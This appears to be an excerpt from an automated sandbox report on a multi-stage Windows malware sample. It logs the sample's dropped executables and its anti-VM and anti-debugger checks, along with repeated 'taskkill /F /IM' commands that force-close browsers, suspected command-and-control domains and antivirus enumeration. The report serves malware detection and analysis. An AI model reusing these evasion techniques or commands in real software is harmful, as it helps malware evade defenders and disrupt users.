                                Source: 8ObkdHP9Hq.exe, 00000000.00000003.1723567713.0000000001490000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                                Source: skotes.exe, 00000005.00000002.2953123746.0000000000B38000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: t4f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_C
                                Source: skotes.exe, 00000005.00000002.2953123746.0000000000B03000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWp
                                Source: 9d7da53f74.exe, 0000003C.00000003.2728003958.0000000001787000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 0000003C.00000002.2748028782.0000000001787000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW~,%
                                Source: skotes.exe, 00000005.00000002.2953123746.0000000000B38000.00000004.00000020.00020000.00000000.sdmp, num.exe, 00000014.00000002.2442698783.0000000000EEA000.00000004.00000020.00020000.00000000.sdmp, num.exe, 00000014.00000002.2442698783.0000000000E8E000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 00000015.00000002.2522203861.0000000000C3E000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 00000015.00000002.2522203861.0000000000CB5000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 00000015.00000003.2521640982.0000000000CB5000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 00000015.00000003.2511615380.0000000000CB5000.00000004.00000020.00020000.00000000.sdmp, num.exe, 0000002C.00000002.2630021156.00000000005E4000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 0000003C.00000003.2728003958.0000000001787000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 0000003C.00000002.2748028782.0000000001787000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                                Source: num.exe, 0000002C.00000002.2630021156.0000000000587000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
                                Source: 9d7da53f74.exe, 00000015.00000002.2522203861.0000000000CB5000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 00000015.00000003.2521640982.0000000000CB5000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 00000015.00000003.2511615380.0000000000CB5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWL
                                Source: 8ObkdHP9Hq.exe, 00000000.00000002.1750930432.0000000000A71000.00000040.00000001.01000000.00000003.sdmp, skotes.exe, 00000001.00000002.1787198522.0000000000F91000.00000040.00000001.01000000.00000007.sdmp, skotes.exe, 00000005.00000002.2955863796.0000000000F91000.00000040.00000001.01000000.00000007.sdmp, 9d7da53f74.exe, 00000015.00000002.2522896601.0000000001130000.00000040.00000001.01000000.0000000D.sdmp, 9d7da53f74.exe, 0000003C.00000002.2745204557.0000000001130000.00000040.00000001.01000000.0000000D.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                                Source: num.exe, 0000002C.00000002.2630021156.0000000000587000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                                Source: 9d7da53f74.exe, 0000003C.00000002.2746326471.000000000170B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW@
                                Source: num.exe, 00000014.00000002.2442698783.0000000000EEA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWD
                                Source: C:\Users\user\AppData\Local\Temp\1000336001\num.exeAPI call chain: ExitProcess graph end node
                                Source: C:\Users\user\AppData\Local\Temp\1000336001\num.exeAPI call chain: ExitProcess graph end node
                                Source: C:\Users\user\AppData\Local\Temp\1000336001\num.exeAPI call chain: ExitProcess graph end node
                                Source: C:\Users\user\AppData\Local\Temp\1000336001\num.exeAPI call chain: ExitProcess graph end node
                                Source: C:\Users\user\AppData\Local\Temp\1000336001\num.exeAPI call chain: ExitProcess graph end node
                                Source: C:\Users\user\AppData\Local\Temp\1000336001\num.exeAPI call chain: ExitProcess graph end node
                                Source: C:\Users\user\AppData\Local\Temp\1000336001\num.exeAPI call chain: ExitProcess graph end node
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeSystem information queried: ModuleInformationJump to behavior
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeProcess information queried: ProcessInformationJump to behavior

                                Anti Debugging

                                barindex
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeThread information set: HideFromDebuggerJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeThread information set: HideFromDebuggerJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeThread information set: HideFromDebuggerJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1000349001\9d7da53f74.exeThread information set: HideFromDebuggerJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1000349001\9d7da53f74.exeThread information set: HideFromDebugger
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 5_2_04E503D2 Start: 04E504ED End: 04E503BC5_2_04E503D2
                                Source: C:\Users\user\AppData\Local\Temp\1000349001\9d7da53f74.exeOpen window title or class name: regmonclass
                                Source: C:\Users\user\AppData\Local\Temp\1000349001\9d7da53f74.exeOpen window title or class name: gbdyllo
                                Source: C:\Users\user\AppData\Local\Temp\1000349001\9d7da53f74.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
                                Source: C:\Users\user\AppData\Local\Temp\1000349001\9d7da53f74.exeOpen window title or class name: procmon_window_class
                                Source: C:\Users\user\AppData\Local\Temp\1000349001\9d7da53f74.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
                                Source: C:\Users\user\AppData\Local\Temp\1000349001\9d7da53f74.exeOpen window title or class name: ollydbg
                                Source: C:\Users\user\AppData\Local\Temp\1000349001\9d7da53f74.exeOpen window title or class name: filemonclass
                                Source: C:\Users\user\AppData\Local\Temp\1000349001\9d7da53f74.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
                                Source: C:\Users\user\AppData\Local\Temp\1000349001\9d7da53f74.exeFile opened: NTICE
                                Source: C:\Users\user\AppData\Local\Temp\1000349001\9d7da53f74.exeFile opened: SICE
                                Source: C:\Users\user\AppData\Local\Temp\1000349001\9d7da53f74.exeFile opened: SIWVID
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeProcess queried: DebugPortJump to behavior
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeProcess queried: DebugPortJump to behavior
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeProcess queried: DebugPortJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess queried: DebugPortJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess queried: DebugPortJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess queried: DebugPortJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess queried: DebugPortJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess queried: DebugPortJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess queried: DebugPortJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1000349001\9d7da53f74.exeProcess queried: DebugPortJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1000349001\9d7da53f74.exeProcess queried: DebugPortJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1000349001\9d7da53f74.exeProcess queried: DebugPortJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1000349001\9d7da53f74.exeProcess queried: DebugPort
                                Source: C:\Users\user\AppData\Local\Temp\1000349001\9d7da53f74.exeProcess queried: DebugPort
                                Source: C:\Users\user\AppData\Local\Temp\1000349001\9d7da53f74.exeProcess queried: DebugPort
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeCode function: 0_2_051A0DD8 rdtsc 0_2_051A0DD8
                                Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exeCode function: 6_2_00B9EAA2 BlockInput,6_2_00B9EAA2
                                Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exeCode function: 6_2_00B52622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,6_2_00B52622
                                Source: C:\Users\user\AppData\Local\Temp\1000336001\num.exeCode function: 20_2_00B845C0 VirtualProtect ?,00000004,00000100,0000000020_2_00B845C0
                                Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exeCode function: 6_2_00B242DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,6_2_00B242DE
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 5_2_00DD652B mov eax, dword ptr fs:[00000030h]5_2_00DD652B
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 5_2_00DDA302 mov eax, dword ptr fs:[00000030h]5_2_00DDA302
                                Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exeCode function: 6_2_00B44CE8 mov eax, dword ptr fs:[00000030h]6_2_00B44CE8
                                Source: C:\Users\user\AppData\Local\Temp\1000336001\num.exeCode function: 20_2_00B99750 mov eax, dword ptr fs:[00000030h]20_2_00B99750
                                Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exeCode function: 6_2_00B80B62 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,6_2_00B80B62
                                Source: C:\Windows\SysWOW64\taskkill.exeProcess token adjusted: DebugJump to behavior
                                Source: C:\Windows\SysWOW64\taskkill.exeProcess token adjusted: DebugJump to behavior
                                Source: C:\Windows\SysWOW64\taskkill.exeProcess token adjusted: DebugJump to behavior
                                Source: C:\Windows\SysWOW64\taskkill.exeProcess token adjusted: DebugJump to behavior
                                Source: C:\Windows\SysWOW64\taskkill.exeProcess token adjusted: DebugJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exeCode function: 6_2_00B52622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,6_2_00B52622
                                Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exeCode function: 6_2_00B4083F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,6_2_00B4083F
                                Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exeCode function: 6_2_00B409D5 SetUnhandledExceptionFilter,6_2_00B409D5
                                Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exeCode function: 6_2_00B40C21 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,6_2_00B40C21
                                Source: C:\Users\user\AppData\Local\Temp\1000336001\num.exeCode function: 20_2_00B9AD48 memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,20_2_00B9AD48
                                Source: C:\Users\user\AppData\Local\Temp\1000336001\num.exeCode function: 20_2_00B9CEEA SetUnhandledExceptionFilter,20_2_00B9CEEA
                                Source: C:\Users\user\AppData\Local\Temp\1000336001\num.exeCode function: 20_2_00B9B33A IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,20_2_00B9B33A
                                Source: C:\Users\user\AppData\Local\Temp\1000336001\num.exeMemory protected: page guardJump to behavior

                                HIPS / PFW / Operating System Protection Evasion

                                barindex
                                Source: Yara matchFile source: Process Memory Space: num.exe PID: 2488, type: MEMORYSTR
                                Source: Yara matchFile source: Process Memory Space: num.exe PID: 6516, type: MEMORYSTR
                                Source: Yara matchFile source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\num[1].exe, type: DROPPED
                                Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\1000336001\num.exe, type: DROPPED
                                Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /TJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /TJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /TJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM opera.exe /TJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM brave.exe /TJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
                                Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
                                Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
                                Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM opera.exe /T
                                Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM brave.exe /T
                                Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
                                Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
                                Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
                                Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM opera.exe /T
                                Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM brave.exe /T
                                Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
                                Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
                                Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
                                Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM opera.exe /T
                                Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM brave.exe /T
                                Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
                                Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
                                Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
                                Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM opera.exe /T
                                Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM brave.exe /T
                                Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
                                Source: 9d7da53f74.exeString found in binary or memory: licendfilteo.site
                                Source: 9d7da53f74.exeString found in binary or memory: clearancek.site
                                Source: 9d7da53f74.exeString found in binary or memory: bathdoomgaz.stor
                                Source: 9d7da53f74.exeString found in binary or memory: spirittunek.stor
                                Source: 9d7da53f74.exeString found in binary or memory: dissapoiznw.stor
                                Source: 9d7da53f74.exeString found in binary or memory: studennotediw.stor
                                Source: 9d7da53f74.exeString found in binary or memory: mobbipenju.stor
                                Source: 9d7da53f74.exeString found in binary or memory: eaglepawnoy.stor
                                Source: C:\Users\user\AppData\Local\Temp\1000336001\num.exeCode function: 20_2_00B99600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,20_2_00B99600
                                Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exeCode function: 6_2_00B81201 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,6_2_00B81201
                                Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exeCode function: 6_2_00B62BA5 SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,6_2_00B62BA5
                                Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exeCode function: 6_2_00B8B226 SendInput,keybd_event,6_2_00B8B226
                                Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exeCode function: 6_2_00BA22DA GetForegroundWindow,GetDesktopWindow,GetWindowRect,mouse_event,GetCursorPos,mouse_event,6_2_00BA22DA
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeProcess created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe" Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exe "C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exe" Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1000336001\num.exe "C:\Users\user\AppData\Local\Temp\1000336001\num.exe" Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1000349001\9d7da53f74.exe "C:\Users\user\AppData\Local\Temp\1000349001\9d7da53f74.exe" Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /TJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /TJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /TJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM opera.exe /TJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM brave.exe /TJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
                                Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
                                Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
                                Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM opera.exe /T
                                Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM brave.exe /T
                                Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
                                Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
                                Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
                                Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM opera.exe /T
                                Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM brave.exe /T
                                Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
                                Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
                                Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
                                Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM opera.exe /T
                                Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM brave.exe /T
                                Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
                                Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
                                Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
                                Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM opera.exe /T
                                Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM brave.exe /T
                                Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
                                Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exeCode function: 6_2_00B80B62 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,6_2_00B80B62
                                Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exeCode function: 6_2_00B81663 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,6_2_00B81663
                                Source: 84d280a9e8.exe, 00000006.00000002.2950379797.0000000000BE2000.00000002.00000001.01000000.00000009.sdmp, 84d280a9e8.exe, 00000019.00000002.2952681186.0000000000BE2000.00000002.00000001.01000000.00000009.sdmp, 84d280a9e8.exe, 0000004E.00000002.2952378189.0000000000BE2000.00000002.00000001.01000000.00000009.sdmpBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
                                Source: 84d280a9e8.exeBinary or memory string: Shell_TrayWnd
                                Source: skotes.exeBinary or memory string: AProgram Manager
                                Source: 8ObkdHP9Hq.exe, 00000000.00000002.1750930432.0000000000A71000.00000040.00000001.01000000.00000003.sdmp, skotes.exe, 00000001.00000002.1787198522.0000000000F91000.00000040.00000001.01000000.00000007.sdmp, skotes.exe, 00000005.00000002.2955863796.0000000000F91000.00000040.00000001.01000000.00000007.sdmpBinary or memory string: AProgram Manager
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 5_2_00DBD3E2 cpuid 5_2_00DBD3E2
                                Source: C:\Users\user\AppData\Local\Temp\1000336001\num.exeCode function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,20_2_00B97B90
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1000336001\num.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1000336001\num.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1000349001\9d7da53f74.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1000349001\9d7da53f74.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1000336001\num.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1000336001\num.exeQueries volume information: C:\ VolumeInformation
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 5_2_00DBCBEA GetSystemTimePreciseAsFileTime,GetSystemTimePreciseAsFileTime,5_2_00DBCBEA
                                Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exeCode function: 6_2_00B7D27A GetUserNameW,6_2_00B7D27A
                                Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exeCode function: 6_2_00B5BB6F _free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,6_2_00B5BB6F
                                Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exeCode function: 6_2_00B242DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,6_2_00B242DE
                                Source: C:\Users\user\AppData\Local\Temp\1000349001\9d7da53f74.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                                Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct
